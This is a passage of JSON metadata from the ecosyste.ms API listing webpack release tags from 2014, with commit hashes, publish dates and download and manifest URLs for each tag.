ests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac180